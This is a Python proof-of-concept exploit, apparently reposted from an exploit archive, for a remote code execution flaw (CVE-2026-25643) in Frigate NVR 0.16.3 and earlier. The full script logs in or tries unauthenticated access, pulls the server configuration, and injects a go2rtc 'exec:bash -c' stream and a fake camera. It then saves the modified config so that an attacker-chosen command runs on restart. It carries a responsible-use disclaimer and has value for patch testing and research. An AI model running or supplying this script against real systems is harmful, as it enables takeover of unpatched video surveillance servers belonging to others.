Share
## https://sploitus.com/exploit?id=PACKETSTORM:216188
#!/usr/bin/env python3
    """
    Frigate NVR ≤ 0.16.3 Blind RCE Exploit
    CVE-2026-25643
    
    This Python exploit targets a critical configuration manipulation vulnerability
    in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths).
    By injecting a malicious go2rtc stream and a fake camera entry,
    it triggers arbitrary command execution as the Frigate process during service restart —
    no reverse shell or output capture required.
    
    Author:          Joshua van der poll (https://github.com/joshuavanderpoll)
    Created:         February 2026
    Version:         1.0
    License:         GNU General Public License v3.0 (GPL-3.0)
    Disclaimer:      Use responsibly. This is a proof-of-concept for a patched
                     vulnerability (fixed in Frigate ≥ 0.16.4). Do not use against
                     systems you do not own or have explicit permission to test.
    
    Credits / References:
    - jduardo2704/CVE-2026-25643-Frigate-RCE
    
    Usage:
        python3 exploit.py -u http://target:5000 -c "touch /tmp/pwned"
        python3 exploit.py -u https://target -U admin -P password -c "id > /tmp/id.txt"
    
    """
    
    import requests
    import argparse
    import sys
    import json
    import urllib3
    import yaml
    import time
    
    # Suppress urllib3's InsecureRequestWarning: the HTTP calls in this script
    # pass verify=False, which would otherwise emit a warning on each request.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # ANSI escape sequences used to colorize console output.
    # RESET restores the terminal's default attributes.
    GREEN = "\x1b[92m"
    YELLOW = "\x1b[93m"
    RED = "\x1b[91m"
    BLUE = "\x1b[94m"
    CYAN = "\x1b[96m"
    RESET = "\x1b[0m"
    
    def print_status(msg, color=BLUE, symbol="[*]"):
        """Print ``msg`` prefixed with ``symbol``, wrapped in ``color`` and followed by RESET."""
        line = "{}{} {}{}".format(color, symbol, msg, RESET)
        print(line)
    
    def print_success(msg):
        """Print ``msg`` as a success line: green, with a ``[+]`` prefix."""
        print_status(msg, color=GREEN, symbol="[+]")
    
    def print_warning(msg):
        """Print ``msg`` as a warning line: yellow, with a ``[!]`` prefix."""
        print_status(msg, color=YELLOW, symbol="[!]")
    
    def print_error(msg, exc=None):
        """Print ``msg`` as an error line (red, ``[-]`` prefix), optionally with exception details.

        Args:
            msg: Text of the error line.
            exc: Optional exception instance. When given, its type name and
                message are printed, followed by a traceback limited to two
                frames.
        """
        print_status(msg, RED, "[-]")
        if exc is None:
            return

        import traceback

        print(f"    → {type(exc).__name__}: {exc}")
        # Print the traceback of the exception that was passed in, rather than
        # whatever exception happens to be "currently handled" (which is what
        # traceback.print_exc() reports, and which is empty outside a handler).
        traceback.print_exception(type(exc), exc, exc.__traceback__, limit=2)
    
    def login_frigate(session, base_url, username, password):
        """POST the credentials to ``/api/login`` and report whether it returned HTTP 200.

        Args:
            session: ``requests.Session`` used to issue the request.
            base_url: Base URL of the target; ``/api/login`` is appended to it.
            username: Value sent as the ``user`` field of the JSON body.
            password: Value sent as the ``password`` field of the JSON body.

        Returns:
            ``True`` when the response status is 200; ``False`` for any other
            status or when the request raises.
        """
        print_status(f"Trying to authenticate as '{username}' ...")
        try:
            resp = session.post(
                f"{base_url}/api/login",
                json={"user": username, "password": password},
                verify=False,
                timeout=12
            )
        except Exception as e:
            # Best-effort: any failure of the request is reported, not raised.
            print_error("Login request failed", e)
            return False

        print_status(f"Login → status code: {resp.status_code}", CYAN)

        if resp.status_code == 200:
            print_success("Login successful")
            return True

        print_warning(f"Login failed - status: {resp.status_code}")
        if resp.text.strip():
            # Show only the start of the body to keep the console readable
            print(f"    Response: {resp.text[:180].strip()}")
        return False
    
    def fetch_config(session, base_url):
        """Download the raw configuration from ``/api/config/raw`` and parse it as YAML.

        If the response body begins and ends with a double quote, it is first
        decoded as a JSON string; when that decoding fails the body is parsed
        as-is.

        Args:
            session: ``requests.Session`` used to issue the request.
            base_url: Base URL of the target; ``/api/config/raw`` is appended to it.

        Returns:
            The parsed configuration as a ``dict``, or ``None`` when the
            request fails, the status is not 200, the YAML cannot be parsed,
            or the parsed document is not a dictionary.
        """
        print_status("Fetching current configuration (/api/config/raw) ...")
        try:
            resp = session.get(f"{base_url}/api/config/raw", timeout=12, verify=False)
            print_status(f"Config fetch → HTTP {resp.status_code}", CYAN)

            if resp.status_code != 200:
                print_error(f"Cannot read config - status {resp.status_code}")
                if resp.text.strip():
                    print(f"    Body preview: {resp.text[:200]}")
                return None

            content = resp.text.strip()
            print_status(f"Received {len(content)} bytes", CYAN)

            # Handle possible JSON string wrapping or direct YAML
            if content.startswith('"') and content.endswith('"'):
                try:
                    content = json.loads(content)
                except ValueError:
                    # json.JSONDecodeError is a ValueError: the body only looked
                    # JSON-wrapped, so keep it unchanged and let YAML parse it.
                    pass
                else:
                    print_status("Config was JSON-wrapped → unwrapped", CYAN)

            try:
                config = yaml.safe_load(content)
            except yaml.YAMLError as e:
                print_error("YAML parsing failed", e)
                print(f"    Raw content preview: {content[:300]}")
                return None

            if not isinstance(config, dict):
                print_error("Parsed config is not a dictionary")
                return None

            print_success(f"Config parsed successfully ({len(config)} top-level keys)")
            return config

        except Exception as e:
            # Best-effort boundary: report any other failure and signal it with None
            print_error("Failed to fetch/parse configuration", e)
            return None
    
    def send_config(session, base_url, config_data, save_option="restart"):
        """Serialize ``config_data`` to YAML and POST it to ``/api/config/save``.

        The outcome is only reported on the console; the function returns
        ``None`` in every case and does not raise on request failures.

        Args:
            session: ``requests.Session`` used to issue the request.
            base_url: Base URL of the target; the save path is appended to it.
            config_data: Configuration object passed to ``yaml.dump``.
            save_option: Value of the ``save_option`` query parameter.
        """
        yaml_payload = yaml.dump(config_data, allow_unicode=True, sort_keys=False)
        bytes_size = len(yaml_payload.encode())

        print_status(f"Sending modified config ({bytes_size:,} bytes) with option: {save_option}")

        try:
            resp = session.post(
                f"{base_url}/api/config/save?save_option={save_option}",
                data=yaml_payload,
                headers={"Content-Type": "text/plain"},
                timeout=10,
                verify=False
            )
            print_status(f"Config save → HTTP {resp.status_code}", CYAN)

            if resp.status_code in (200, 204):
                print_success("Configuration accepted (server should restart)")
            else:
                print_warning(f"Config rejected - status {resp.status_code}")
                if resp.text.strip():
                    print(f"    Server response: {resp.text[:300].strip()}")

        except requests.Timeout:
            # A timeout is reported as a warning rather than an error
            print_warning("Request timed out - server might be restarting already")
        except Exception as e:
            print_error("Failed to send modified configuration", e)
    
    def inject_command_into_config(config, command):
        """Add a ``debug_cmd`` go2rtc stream and a ``trigger_exec`` camera to ``config``.

        The stream's single source is ``exec:`` followed by ``bash -c '<command>'``;
        the camera's ffmpeg input path is ``rtsp://127.0.0.1:8554/debug_cmd``.
        Existing ``debug_cmd`` / ``trigger_exec`` entries are overwritten.

        Args:
            config: Configuration dictionary; it is modified in place.
            command: Command string interpolated into the stream source.

        Returns:
            The same ``config`` object that was passed in.
        """
        print_status(f"Preparing payload โ†’ executing: {command}")
        
        payload = f"bash -c '{command}'"
        print_status(f"Using payload: {payload}", CYAN)
    
        # Make sure the go2rtc -> streams mapping exists before adding to it
        if 'go2rtc' not in config:
            config['go2rtc'] = {}
        if 'streams' not in config['go2rtc']:
            config['go2rtc']['streams'] = {}
    
        config['go2rtc']['streams']['debug_cmd'] = [f"exec:{payload}"]
        print_success("Injected malicious stream โ†’ debug_cmd")
    
        # Camera entry whose ffmpeg input refers to the debug_cmd stream
        if 'cameras' not in config:
            config['cameras'] = {}
    
        config['cameras']['trigger_exec'] = {
            'ffmpeg': {
                'inputs': [{
                    'path': 'rtsp://127.0.0.1:8554/debug_cmd',
                    'roles': ['detect']
                }]
            },
            'detect': {'enabled': False},
            'audio':  {'enabled': False},
            'enabled': True
        }
        print_success("Injected trigger camera โ†’ trigger_exec")
    
        return config
    
    def exploit_command(base_url, username, password, command):
        """Run the full sequence: optional login, config fetch, modification, and save.

        Exits the process with status 1 when the configuration cannot be
        fetched or the modified configuration cannot be prepared.

        Args:
            base_url: Base URL of the target.
            username: Login name, or a falsy value to skip authentication.
            password: Login password, or a falsy value to skip authentication.
            command: Command string handed to ``inject_command_into_config``.
        """
        session = requests.Session()
        session.verify = False

        # Authentication (only attempted when both values are supplied).
        # The login result is not checked; the run continues either way.
        if username and password:
            login_frigate(session, base_url, username, password)
        else:
            print_warning("No credentials provided → attempting unauthenticated access")

        # Get current config
        config = fetch_config(session, base_url)
        if not config:
            print_error("Exploit aborted - cannot continue without valid config")
            sys.exit(1)

        # Modify config with our command
        try:
            modified_config = inject_command_into_config(config, command)
        except Exception as e:
            print_error("Failed to prepare malicious config", e)
            sys.exit(1)

        # Small delay
        time.sleep(1.2)

        # Send modified config
        send_config(session, base_url, modified_config)

        print("\n" + "="*60)
        print(f" {GREEN}Payload sent! Command should execute during go2rtc init / camera probe.{RESET}")
        print(" Keep in mind:")
        print(" • Output is NOT captured (blind execution)")
        print(" • Command runs as the user/frigate process")
        print(" • Multiple executions may occur during restart")
        print("="*60 + "\n")
    
    def main():
        """Parse command-line arguments and run ``exploit_command``.

        Exit codes set here: 2 when interrupted with Ctrl-C, 3 on any other
        unhandled exception.
        """
        parser = argparse.ArgumentParser(
            description="Frigate <= 0.16.3 RCE – execute blind command (CVE-2026-25643)"
        )
        parser.add_argument('-u', '--url',      required=True,  help="Target URL (http(s)://host:port)")
        parser.add_argument('-U', '--username', required=False, help="Username (optional)")
        parser.add_argument('-P', '--password', required=False, help="Password (optional)")
        parser.add_argument('-c', '--cmd',      required=True,  help="Command to execute on target")

        args = parser.parse_args()

        # Drop trailing slashes so API paths can be appended directly
        base_url = args.url.rstrip('/')
        print(f"\n {BLUE}Target :{RESET} {base_url}")
        if args.username:
            print(f" {BLUE}User   :{RESET} {args.username}")
        print(f" {BLUE}Command:{RESET} {args.cmd}\n")

        try:
            exploit_command(
                base_url=base_url,
                username=args.username,
                password=args.password,
                command=args.cmd
            )
        except KeyboardInterrupt:
            print_warning("Interrupted by user")
            sys.exit(2)
        except Exception as e:
            print_error("Unexpected fatal error", e)
            sys.exit(3)
    
    # Run main() only when the file is executed as a script, not when imported.
    if __name__ == "__main__":
        main()